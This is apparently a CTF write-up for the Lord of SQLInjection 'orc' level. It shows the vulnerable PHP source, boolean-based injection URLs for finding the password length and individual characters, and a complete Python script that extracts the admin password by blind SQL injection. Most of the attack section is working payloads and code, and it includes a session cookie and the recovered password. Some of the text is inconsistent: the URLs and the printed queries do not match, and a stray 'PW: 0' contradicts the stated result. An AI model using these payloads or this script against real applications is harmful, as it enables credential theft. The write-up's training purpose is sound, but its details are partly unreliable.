
[los]orc

2021. 3. 25. 22:35
<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  $query = "select id from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello admin</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orc"); 
  highlight_file(__FILE__); 
?>

 

Reading the code: the first query is built from the raw pw parameter and only prints "Hello admin", so it serves as a true/false oracle. The second query runs pw through addslashes() and then compares the stored password with the submitted one, so the challenge is solved only by recovering admin's actual password and submitting it.

https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=aaa'or'1'='1

query : select id from prob_orc where id='admin' and pw='aaa'or'1'='1'

The query prints "Hello admin".

 

https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=aaa'or'1'='0

query : select id from prob_orc where id='admin' and pw='aaa'or'1'='0'

Changing '1'='1' to '1'='0' prints nothing.

So the "Hello admin" banner works as a yes/no oracle: blind SQL injection looks possible.


https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=123%27%20or%20id=%27admin%27%20and%20length(pw)=%278

query : select id from prob_orc where id='admin' and pw='123' or id='admin' and length(pw)='8'

This finds the password length. Because AND binds tighter than OR, the WHERE clause reads as pw='123' or (id='admin' and length(pw)='8'), so the banner appears only when admin's password is 8 characters long.


 



https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=123%27%20or%20%271%27=%271%27%20and%20substr(pw,1,1)=%27d

query : select id from prob_orc where id='admin' and pw='123' or '1'='1' and substr(pw,1,1)='0'

This query is wrong. The left side of the OR (pw='123') is always false, and the right side, '1'='1' and substr(pw,1,1)='...', matches the first row of any user whose password starts with that character; the page prints "Hello admin" whenever the first returned row has an id, so a banner here says nothing certain about admin's password.

"Hello admin" was printed.

Comparing substr(pw, i, 1) against candidate values one position at a time with comparison operators recovers the whole password.

Doing this by hand is tedious, so it was automated in Python.

pw: djfa9852

 


https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=123%27%20or id='admin' and substr(pw,1,1)='0

query : select id from prob_orc where id='admin' and pw='123' or id='admin' and substr(pw,1,1)='0'

With the right-hand clause anchored on id='admin', the OR branch can only be satisfied by admin's row, so this is the form used for the extraction; here the first character is tested against '0'.

PW: 0

 

Brute force: write the Python script below and run it.

# orc Blind SQL Injection
import requests

# Candidate characters; '_' is left out because the page's filter rejects it anyway.
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*'
pw = ''
url = 'https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php'
# Logged-in session cookie; login_chk() rejects anonymous requests.
cookies = {'PHPSESSID': '7cu8mcoov0uo0qirli9sk9d38j'}

# The password is 8 characters long (length(pw)='8' above), so probe positions 1..8.
for i in range(1, 9):
    for char in chars:
        # Anchor on id='admin' so the OR branch cannot be satisfied by another user's row.
        param = {'pw': "123' or id='admin' and substr(pw," + str(i) + ",1)='" + char}
        # TLS verification stays on (the original passed verify=False, which is not needed here).
        res = requests.get(url, cookies=cookies, params=param)
        if "Hello admin" in res.text:
            pw += char
            print("PW:" + pw)
            break

print("PW:" + pw)
